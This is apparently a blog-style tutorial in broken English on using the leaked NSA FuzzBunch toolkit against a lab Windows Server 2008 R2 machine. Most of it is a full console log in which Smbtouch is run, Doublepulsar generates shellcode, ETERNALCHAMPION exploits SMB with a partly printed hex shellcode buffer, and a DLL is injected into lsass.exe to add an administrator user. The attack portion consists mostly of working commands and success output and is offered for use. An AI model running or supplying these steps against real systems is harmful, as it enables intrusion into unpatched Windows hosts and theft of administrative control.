Some of the words
Maybe talke about the 17010 you just know the ETERNALBLUE? Now I will take more way to attack the ETERNAL*, for supplement the ms17010 bypass attack basic operation,Because of the local environment, I will mainly use ETERNALCHAMPION as an example
Actual use
This way using the nsa public tools to attack, basic operation also very easy, may be you can follow me generate the sc, inject the sc, your dll attack
Using the public tools you must be found the vulnerable like this
Using Doublepulsar to generate the sc
Copy your sc
Samlpe inject your sc
If you use the ETERNALROMANCE you will be know this dir you just give the sc dir, don't need to paste your sc
Confirm your success
Using your dll to attack
Confirm your success
Success to add a admin user
Other Eternal you can use the way to easy attack
Order record examlpe
fb > use smbtouch
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
fb Touch (Smbtouch) > execute
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[*] Executing Plugin
[+] Smbtouch Succeeded
fb Touch (Smbtouch) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
fb Payload (Doublepulsar) > apply
[*] Applying Session Parameters
[+] Set Protocol => SMB
fb Payload (Doublepulsar) > prompt confirm
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[*] TargetIp :: Target IP Address
[*] TargetPort :: Port used by the Double Pulsar back door
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[*] OutputFile :: Full path to the output file
[+] Set OutputFile => c:\shellcode.bin
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[+] (TCP) Local 192.168.159.143:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
OutputFile c:\shellcode.bin
Protocol SMB
Architecture x64
Function OutputInstall
[*] Executing Plugin
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) >
fb Payload (Doublepulsar) > use eternalchampion
[!] Entering Plugin Context :: Eternalchampion
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
fb Special (Eternalchampion) > apply
[*] Applying Session Parameters
fb Special (Eternalchampion) > echo Running Exploit Touches
[*] Running Exploit Touches
fb Special (Eternalchampion) > touch all
fb Special (Eternalchampion) > use Smbtouch
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
[*] Inheriting Input Variables
fb Touch (Smbtouch) > prompt
[!] Enter Prompt Mode :: Smbtouch
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[*] TargetIp :: Target IP Address
[*] TargetPort :: Port used by the SMB service
[*] Pipe :: Test an additional pipe to see if it is accessible (optional)
[*] Share :: Test a file share to see if it is accessible (optional), entered as hex bytes (in unicode)
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB
1) NBT
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
fb Touch (Smbtouch) > execute
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[*] Executing Plugin
[+] Smbtouch Succeeded
[*] Exporting Contract To Exploit
[+] Set PipeName => lsarpc
[+] Set ShareName =>
[+] Set Credentials => Anonymous
[+] Set Target => SERVER_2008R2_SP1
[+] Set TargetOsArchitecture => x64
fb Touch (Smbtouch) > enter Special
fb Special (Eternalchampion) > prompt confirm
[!] Enter Prompt Mode :: Eternalchampion
Module: Eternalchampion
=======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
PipeName lsarpc
ShareName
ShellcodeBuffer
Credentials Anonymous
Protocol SMB
Target SERVER_2008R2_SP1
TargetOsArchitecture x64
[!] Plugin Variables are NOT Valid
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[*] TargetIp :: The actual (non-redirected) Target IP Address
[*] TargetPort :: The actual (non-redirected) Target TCP port
[*] PipeName :: The named pipe to use (Win7+ only, need Pipe or Share)
[*] ShareName :: The name of the share to use in Unicode (Win7+ only, need Pipe or Share)
[*] ShellcodeBuffer :: DOPU Shellcode buffer
[+] Set ShellcodeBuffer => 31C040900F8490060000E800000000586089C389E583EC6064... (plus 7260 characters)
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB SMB protocol
1) NBT Netbios protocol
[*] Target :: Operating System, Service Pack, of target OS
0) XP_SP0SP1_X86 Windows XP Sp0 and Sp1, 32-bit
1) XP_SP2SP3_X86 Windows XP Sp2 and Sp3, 32-bit
2) XP_SP1_X64 Windows XP Sp1, 64-bit
3) XP_SP2_X64 Windows XP Sp2, 64-bit
4) SERVER_2003_SP0 Windows Sever 2003 Sp0, 32-bit
5) SERVER_2003_SP1 Windows Sever 2003 Sp1, 32-bit/64-bit
6) SERVER_2003_SP2 Windows Sever 2003 Sp2, 32-bit/64-bit
7) VISTA_SP0 Windows Vista Sp0, 32-bit/64-bit
8) VISTA_SP1 Windows Vista Sp1, 32-bit/64-bit
9) VISTA_SP2 Windows Vista Sp2, 32-bit/64-bit
10) SERVER_2008_SP0 Windows Server 2008 Sp0, 32-bit/64-bit
11) SERVER_2008_SP1 Windows Server 2008 Sp1, 32-bit/64-bit
12) SERVER_2008_SP2 Windows Server 2008 Sp2, 32-bit/64-bit
13) WIN7_SP0 Windows 7 Sp0, 32-bit/64-bit
14) WIN7_SP1 Windows 7 Sp1, 32-bit/64-bit
15) SERVER_2008R2_SP0 Windows Server 2008 R2 Sp0, 32-bit/64-bit
*16) SERVER_2008R2_SP1 Windows Server 2008 R2 Sp1, 32-bit/64-bit
17) WIN8_SP0 Windows 8 Sp0, 32-bit/64-bit
[*] TargetOsArchitecture :: The architecture of the target operating system
0) Unknown The architecture is not known (exploit will figure it out)
1) x86 The target is 32-bit
*2) x64 The target is 64-bit
fb Special (Eternalchampion) > execute
[!] Preparing to Execute Eternalchampion
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[+] Run Mode: FB
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Eternalchampion
=======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
DaveProxyPort 0
MaxExploitAttempts 42
PipeName lsarpc
ShareName
ShellcodeBuffer 31c040900f8490060000e800000000586089c389e583ec6064
8b0d38000000668b4106c1e010668b01662500f08b086681f9
4d5a74072d00100000ebf08945fc5389c3b9940169e3e8c601
00008945f8b9855483f0e8b90100008945f4b92e5b51d2e8ac
0100008945ecb9b45ca05be89f0100008945a45bb914010000
29cc890c2454ff55a48b4c24048b54240881c41401000031c0
... (plus 140 more lines)
Credentials Anonymous
Protocol SMB
Target SERVER_2008R2_SP1
TargetOsArchitecture x64
[*] Executing Plugin
[+] Eternalchampion Succeeded
fb Special (Eternalchampion) > use doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
fb Payload (Doublepulsar) > apply
[*] Applying Session Parameters
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'
fb Payload (Doublepulsar) > prompt confirm
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
OutputFile c:\shellcode.bin
Protocol SMB
Architecture x64
Function OutputInstall
[!] plugin variables are valid
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[*] TargetIp :: Target IP Address
[*] TargetPort :: Port used by the Double Pulsar back door
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[*] Architecture :: Architecture of the target OS
0) x86 x86 32-bits
*1) x64 x64 64-bits
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[+] Set Function => Ping
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[+] (TCP) Local 192.168.159.143:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
Protocol SMB
Architecture x64
Function Ping
[*] Executing Plugin
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) > use doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.159.143
fb Payload (Doublepulsar) > apply
[*] Applying Session Parameters
[*] Function :: Deconflict
Index Session ID Value
----- ---------- -----
0 Doublepulsar - 1
1 Doublepulsar - 4
2 Current Value Ping
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'
fb Payload (Doublepulsar) > prompt confirm
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
Protocol SMB
Architecture x64
Function Ping
[!] plugin variables are valid
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[*] TargetIp :: Target IP Address
[*] TargetPort :: Port used by the Double Pulsar back door
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[*] Architecture :: Architecture of the target OS
0) x86 x86 32-bits
*1) x64 x64 64-bits
[*] Function :: Operation for backdoor to perform
0) OutputInstall Only output the install shellcode to a binary file on disk.
*1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[+] Set DllPayload => C:\dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[*] ProcessName :: Name of process to inject into
[*] ProcessCommandLine :: Command line of process to inject into
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[+] (TCP) Local 192.168.159.143:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.159.143
TargetPort 445
DllPayload C:\dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[*] Executing Plugin
[+] Doublepulsar Succeeded
